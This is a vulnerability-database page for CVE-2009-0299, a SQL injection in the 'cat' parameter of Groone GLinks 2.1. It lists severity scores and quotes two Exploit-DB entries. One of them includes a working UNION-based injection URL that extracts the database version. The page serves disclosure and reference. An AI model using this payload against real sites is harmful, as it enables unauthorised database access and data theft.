CVE-2009-0299
published 2009-01-27CVE-2009-0299: SQL injection vulnerability in index.php in Groone GLinks 2.1 allows remote attackers to execute arbitrary SQL commands via the cat parameter.
PriorityP341high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
1.03%
59.5th percentile
SQL injection vulnerability in index.php in Groone GLinks 2.1 allows remote attackers to execute arbitrary SQL commands via the cat parameter.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| groonesworld | glinks | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Groone's GLink ORGanizer 2.1 - 'cat' Blind SQL Injection
exploitdb·2009-07-23
CVE-2009-0299 Groone's GLink ORGanizer 2.1 - 'cat' Blind SQL Injection
Groone's GLink ORGanizer 2.1 - 'cat' Blind SQL Injection
---
_00000__00000__00000__00000__0___0__00000____0___0___000___0___0_
_0______0___0__0___0__0______00_00__0________00_00__0___0__00_00_
_0000___00000__00000__00000__0_0_0__00000____0_0_0__0___0__0_0_0_
_____0______0______0__0______0___0__0________0___0__00000__0___0_
_0000___00000__00000__00000__0___0__00000____0___0__0___0__0___0_
# [+] GLinks v2.1 (cat) Remote Blind SQL Injection Vulnerability
# [+] Software : President Bios
# [+] Author : 599eme Man
# [+] Contact : [email protected]
# [+] Thanks : Moudi, Neocoderz, Sheiry, Shimik Root aka Str0zen, Pr0H4ck3rz, Staker, Security-shell...
# [+] Special Thanks : Moudi Aka SixSo brozazaaaaaaaaa
# [+] Dowload : http://www.groonesworld.com/programs/glinks/glinks.zip
#
#[------------------
Exploit-DB
Groone's GLink ORGanizer - 'index.php?cat' SQL Injection
exploitdb·2009-01-26
CVE-2009-0299 Groone's GLink ORGanizer - 'index.php?cat' SQL Injection
Groone's GLink ORGanizer - 'index.php?cat' SQL Injection
---
#Groone's GLink Organizer (index.php) SQL Injection Vulnerability
#Author: nuclear
#download:
http://www.groonesworld.com/programs/glinks/glinks.zip
#vuln:
http://localhost/[path]/index.php?cat=-1 union select 1,@@version,3 %23
#greetz Mi4night, cAs, zYzTeM, THE_MAN, Pepe, I-O-W-A,Digitalfortress, DiGitalX, sys32-hack, sys32r, Whitestar
# milw0rm.com [2009-01-26]
No writeups or analysis indexed.
http://osvdb.org/51628http://secunia.com/advisories/33649http://www.securityfocus.com/bid/33460https://www.exploit-db.com/exploits/7878https://www.exploit-db.com/exploits/9236http://osvdb.org/51628http://secunia.com/advisories/33649http://www.securityfocus.com/bid/33460https://www.exploit-db.com/exploits/7878https://www.exploit-db.com/exploits/9236
2009-01-27
Published